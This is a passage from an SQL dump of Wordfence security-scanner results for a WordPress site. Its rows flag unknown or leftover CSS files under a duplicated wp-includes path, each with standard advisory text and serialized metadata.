More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/css/dist/block-library/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33877,1631564684,1631564684,'new','knownfile',75,'982e45d54f801196f6a37b5dbfdfd22e','b0a01292780f2a9d1345f6dee66718a5','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/css/dist/block-library/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33878,1631564684,1631564684,'new','knownfile',75,'618d344873f111c2fabaf3272b785391','4ec8a56527718ae1366f1a190066d688','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/css/dist/block-library/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33879,1631564684,1631564684,'new','knownfile',75,'1e3aa1dca063663f7159b8c59381258c','bae4bca4d74854353c8e1f67438163b1','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/theme-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/css/dist/block-library/theme-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33880,1631564684,1631564684,'new','knownfile',75,'b84c0778ec182f99bde295f7f14b65c2','1b346f3921487d2701b64bc04f6867fd','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/theme-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/css/dist/block-library/theme-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33881,1631564684,1631564684,'new','knownfile',75,'5885fe7aea535ab089341f106e3f5b24','c24a9ebe1763abd4569d9b36c0870f23','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/theme.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/css/dist/block-library/theme.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33882,1631564684,1631564684,'new','knownfile',75,'b8837a9c1fe952cbcd264ccb6d0dae9b','f618dac3581d7b9770a25ef52088b493','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/theme.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/css/dist/block-library/theme.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33883,1631564684,1631564684,'new','knownfile',75,'88eb3d8aae5ba58228667c8b0c1711b3','850b02a1e21b452880bfb22f90161b65','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/components/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/css/dist/components/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33884,1631564684,1631564684,'new','knownfile',75,'099f7797343748173a6730ddebe8c5a3','6595a907e9e25b0eaf00c6c6c8db8840','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/components/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/components/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33885,1631564684,1631564684,'new','knownfile',75,'864599f11818045bcffe987767893ddf','e79fe1de83cb063952a813d0a183a66e','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/components/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/css/dist/components/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33886,1631564685,1631564685,'new','knownfile',75,'b28e1618030d06a460640d5d41161988','23a452e4275b5ae22a01a050916f654a','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/components/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/css/dist/components/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33887,1631564685,1631564685,'new','knownfile',75,'dfe01b85bebfdc77e47fc3a473117c99','e010118a560da8323bd1ecf324113af6','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/edit-post/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/css/dist/edit-post/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33888,1631564685,1631564685,'new','knownfile',75,'49cf8f22fc88854a7e4223c8f1ddd03c','6756ff29be04601696f456bf46873b78','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/edit-post/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/css/dist/edit-post/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33889,1631564685,1631564685,'new','knownfile',75,'bb79e97ad2c80919252b83b4aadbfe4c','9b7675a2af63d4e699bd2b3aab28f444','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/edit-post/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/css/dist/edit-post/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33890,1631564685,1631564685,'new','knownfile',75,'14f9635cf7f7c4df255dfb8808cd05ab','9804a92e9b5b28b04fd8a85f81ccb94a','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/edit-post/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/css/dist/edit-post/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33891,1631564685,1631564685,'new','knownfile',25,'2c0724e10a7fbe3aa5110e5079fb397c','a6e5c4c3c87db2d381281439e9a0402a','Old WordPress core file not removed during update: wp-includes/wp-includes/css/dist/editor/editor-styles-rtl.css','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/editor/editor-styles-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33892,1631564685,1631564685,'new','knownfile',25,'cc4149e853f0eda0743883792383841d','83a884b0b6fd5faed7b2e2b612007cfe','Old WordPress core file not removed during update: wp-includes/wp-includes/css/dist/editor/editor-styles-rtl.min.css','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/css/dist/editor/editor-styles-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33893,1631564685,1631564685,'new','knownfile',25,'8200247f971138f765517b8982c0e027','a847f74bcb1028b4b959474edf621fe4','Old WordPress core file not removed during update: wp-includes/wp-includes/css/dist/editor/editor-styles.css','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/css/dist/editor/editor-styles.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33894,1631564685,1631564685,'new','knownfile',25,'6ae70aa028d1da45b610694fd0d94813','5fd2ebc5cf7d580dd6fcfe2bb52f3ca5','Old WordPress core file not removed during update: wp-includes/wp-includes/css/dist/editor/editor-styles.min.css','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/editor/editor-styles.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33895,1631564685,1631564685,'new','knownfile',75,'3457d93b88728955ad8eb8d8c08003ea','ab57a0886aa736a5a30d178fa398e06b','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/editor/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/css/dist/editor/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33896,1631564685,1631564685,'new','knownfile',75,'55873620d67e190d1c9adcd21c07af75','e0ab156e9e46ff71903fac0f74b5edb6','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/editor/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/css/dist/editor/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33897,1631564685,1631564685,'new','knownfile',75,'186a67a6b6496b34af6bf60b81e27ed9','70d39054fe5b25448a0d9275bab4faed','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/editor/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/css/dist/editor/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33898,1631564685,1631564685,'new','knownfile',75,'7593ce491704d2934ae82ff09d14384f','c632c50e645c7f3f7486d65179795113','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/editor/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/css/dist/editor/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33899,1631564685,1631564685,'new','knownfile',75,'779a3f303387a04c3eaeddce2b0756c5','c5d3a26785c8e46dde5b1bcf7349f8f4','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/format-library/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/format-library/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33900,1631564685,1631564685,'new','knownfile',75,'b51b772cf7cc273d2be29f1f40ece5d8','c57ddee0ee2d846c78ff37571fe577f4','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/format-library/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/css/dist/format-library/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33901,1631564685,1631564685,'new','knownfile',75,'26d6a80591bafa5ddb59cbf90390bc4f','0edd21f624e5e6ad657857cedbf46387','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/format-library/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/css/dist/format-library/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33902,1631564685,1631564685,'new','knownfile',75,'8eeffa5038180d505ef25042bfe04717','fc0a9f126ba997b6ef9d1fdfad9fbf4a','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/format-library/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/format-library/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33903,1631564685,1631564685,'new','knownfile',75,'bf3ebc270cfd0200471c9645a2c09011','88b54d5cbeb737fcfc469e268f760b9d','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/list-reusable-blocks/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/css/dist/list-reusable-blocks/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33904,1631564685,1631564685,'new','knownfile',75,'59d35f6fea1d95e926099b4c0497c6d6','4037f6a08c4b8409c28d3a9b49cf6dc4','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33905,1631564685,1631564685,'new','knownfile',75,'bfb5176d7cabad2cb638324d923d6f38','e519a06c916cca9cca101e99efa0465a','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/list-reusable-blocks/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/css/dist/list-reusable-blocks/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33906,1631564685,1631564685,'new','knownfile',75,'092e7139564694d7e9219e4e4ca8821e','1b2269bda2aa333c5d1d918232bf7c1f','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/list-reusable-blocks/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/css/dist/list-reusable-blocks/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33907,1631564685,1631564685,'new','knownfile',75,'df538fcba5354b4ae77cdfc0f12a4d06','d74c907d99fa2a9a4696cec7b15a19ff','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/nux/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/css/dist/nux/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33908,1631564685,1631564685,'new','knownfile',75,'e3325e0490d8648794a0262e20f85396','b5fd656507cbd6ed7213ee6c207a2d89','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/nux/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/css/dist/nux/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33909,1631564685,1631564685,'new','knownfile',75,'7950ff61dd831ffce5a38cfc0ab4d05f','d8f78cad995582e8229b7a352e8d93c0','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/nux/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/css/dist/nux/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33910,1631564685,1631564685,'new','knownfile',75,'f2fd4fb420f885c1505034bed755ecc2','db72b4c749e6a2b6db8a3d7ce8da5a24','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/nux/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/css/dist/nux/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33911,1631564685,1631564685,'new','knownfile',75,'a48b1637b75e288646610deca452cab0','600ce8b1ddfaecdf9d8520b17518652c','Unknown file in WordPress core: wp-includes/wp-includes/css/editor-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/css/editor-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33912,1631564685,1631564685,'new','knownfile',75,'8ad11f7640c69f885cf2bf352c80884a','170917219f56ea80bbec3a260af2d0bc','Unknown file in WordPress core: wp-includes/wp-includes/css/editor-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/css/editor-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33913,1631564685,1631564685,'new','knownfile',75,'c4ffba0e56d6d86ab3c8f498134e81ef','2bb372a8cc1df38792abade6cfa7aea2','Unknown file in WordPress core: wp-includes/wp-includes/css/editor.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/css/editor.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33914,1631564685,1631564685,'new','knownfile',75,'5e85f1aaf55961a028127c052faa7e6a','9a665e4b65e86bb87377c31bcdd44de3','Unknown file in WordPress core: wp-includes/wp-includes/css/editor.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/css/editor.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33915,1631564685,1631564685,'new','knownfile',75,'9353242e6e9054ecfb903d32ed3ce6ea','2410b5b6757e18ff1d0b65e00fa2ecc9','Unknown file in WordPress core: wp-includes/wp-includes/css/jquery-ui-dialog-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/css/jquery-ui-dialog-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33916,1631564685,1631564685,'new','knownfile',75,'59c2a41b716444b66b275e17b26615e3','515ee037941738562a8a6a7d43477c40','Unknown file in WordPress core: wp-includes/wp-includes/css/jquery-ui-dialog-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 